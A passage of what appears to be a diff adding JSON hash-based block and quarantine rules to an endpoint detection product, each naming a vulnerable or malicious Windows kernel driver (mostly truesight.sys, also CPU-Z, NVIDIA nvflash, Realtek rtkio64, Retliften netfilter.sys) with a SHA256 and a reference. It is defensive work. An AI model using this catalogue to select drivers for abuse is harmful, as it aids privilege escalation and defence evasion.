"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487790Z", + "creation_date": "2026-03-23T11:45:31.487792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d8b836c71c8667a139913f64a92befb05b7c5d033b317dc66d105f9fe4054ab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f91298e-302c-5c9f-ba6e-9950ab81b1ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143706Z", + "creation_date": "2026-03-23T11:45:32.143708Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:32.143713Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68fcb5cf6723dd195cf6d929cf9c6aaaca649f6956eb3bd63c2c1a8391c0b21f", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3f976fa7-08ae-5375-a0ee-c88e57fc7711", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459518Z", + "creation_date": "2026-03-23T11:45:30.459522Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cd75de5f54b799b60789696587b56a4a793cf60775b81f236f0e65189d863af", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3fa5da34-a66b-5d37-b1d3-7df59c137fb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149591Z", + "creation_date": "2026-03-23T11:45:31.149595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90856e306cd74eace432eae85219e1e0c9100a2f0a3e2f9eea2b0c6fd6c0e432", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3faa536d-dafc-59af-b476-996a2e0769cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820027Z", + "creation_date": "2026-03-23T11:45:31.820030Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a71a5982e38a10f35e7206c08d8ecdfe90af3266eebc29921ab440116640b169", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3fab97d8-ba09-5c2e-9101-1427b5fc4117", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982396Z", + "creation_date": "2026-03-23T11:45:29.982398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982404Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10", + "comment": "Vulnerable Kernel Driver (aka aswVmm.sys) [https://www.loldrivers.io/drivers/a845a05c-5357-4b78-9783-16b4d34b2cb0/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3faee5ce-940c-51b7-bf73-7a3c210becce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.828854Z", + "creation_date": "2026-03-23T11:45:31.828856Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0eee29a0c648ac6f60b3d6ad1a989d17a2a81c966fda78ccedee43b1a29273f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3fb6a4fd-eea4-5e6e-a857-a24bc7cf5943", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475959Z", + "creation_date": "2026-03-23T11:45:30.475962Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475971Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66f8bd2b29763acfbb7423f4c3c9c3af9f3ca4113bd580ab32f6e3ee4a4fc64e", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"3fb90333-a41d-5ba8-98fe-1ba812a2001d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617097Z", + "creation_date": "2026-03-23T11:45:29.617099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6999caca67b37860abb5e6d95420d1b0d04966bc6674aac3bfde4e2394ad37fd", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3fb905eb-4b03-59b3-8e72-c2fe4ed4fc33", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831966Z", + "creation_date": "2026-03-23T11:45:30.831969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.831974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a433e39aebe84fb5dcce175122236348841199310f361c14a0f7d940123260c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3fbe5a7f-961b-5403-abf7-9fc90f6980ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156791Z",
+ "creation_date": "2026-03-23T11:45:31.156793Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e0cec48e65c52d54b7c2977fb1147740fa82951f72e5a9a802eec88ad5a2431",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ff41ceb-b7b8-5334-9f8f-e3e84dda7629",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825853Z",
+ "creation_date": "2026-03-23T11:45:30.825855Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825861Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92f4ae495acc3196299fd44196386ca021e639ca29c21b5c2c03b7c24f207078",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ff4a3d0-dcec-5bbf-abdd-38cdc8f3800d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610211Z",
+ "creation_date": "2026-03-23T11:45:29.610213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e58bbf3251906ff722aa63415bf169618e78be85cb92c8263d3715c260491e90",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ffbe2df-f941-570b-a9b9-83f9b8c6061c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619474Z",
+ "creation_date": "2026-03-23T11:45:29.619475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619481Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e657e54c341d37881837dbaf553e10bbe31ff2d6ccf9ca939ca5433ec464a73b",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "401507f6-311a-57d5-8d59-0610ebdfbb39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480791Z",
+ "creation_date": "2026-03-23T11:45:31.480794Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6b6b7606fec21af6dd3532314592dbcead7f43852044e1f3655889f50cb0704",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4016d471-bc45-5cb2-b523-62ceef6bdc24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827428Z",
+ "creation_date": "2026-03-23T11:45:31.827431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827439Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dcae7db1bb23c65b5ba8fc33cb70bd899b5885476f1a9ff8a85e3870f16068c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "401c9651-db4d-53b9-a405-4b52e05abbeb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487505Z",
+ "creation_date": "2026-03-23T11:45:31.487507Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c4190298c143714531a86458e5e3934fbc3fca0a9d73f44cc6757fb85e78082",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4024bcd0-78ee-54b0-a47b-ad27ea514ae0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618788Z",
+ "creation_date": "2026-03-23T11:45:29.618791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618797Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcef3c2fe44a68992d2344a8ec129e9d35e7790f4317e9bd7bca6bf217252d91",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "403376f8-965d-5ce6-9a46-cf5e0119852d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489627Z",
+ "creation_date": "2026-03-23T11:45:31.489630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aca2d74e09757c2a29e5ed4a1530d2b33f17b11cf5a15567afef30e6fe77debe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "404d22e7-291a-535c-a397-bfd0e70b4e80",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490748Z",
+ "creation_date": "2026-03-23T11:45:31.490750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33152527615b92ced0d54dd7bf4ccd20cded5ce85232425fba7991b22942a763",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4052fa9f-023e-597e-8268-131520bb6fba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834241Z",
+ "creation_date": "2026-03-23T11:45:30.834245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834253Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7da06c9844088ecb59445f8d04f13a42b435ed71843fbdde8af44ef4cae234fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4053de44-a1e7-5f18-9e4e-82ce48523feb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491574Z",
+ "creation_date": "2026-03-23T11:45:31.491577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1568a3eed6dffeeb9869cbcb7f6fd852d05b2eb8f78f4b4242a54e652052f4ca",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4054dfc2-c271-54a7-a88d-d6efb29cec45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967420Z",
+ "creation_date": "2026-03-23T11:45:29.967422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac4",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "405a2d52-5d19-5d06-b75c-ff8c9fefbe42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
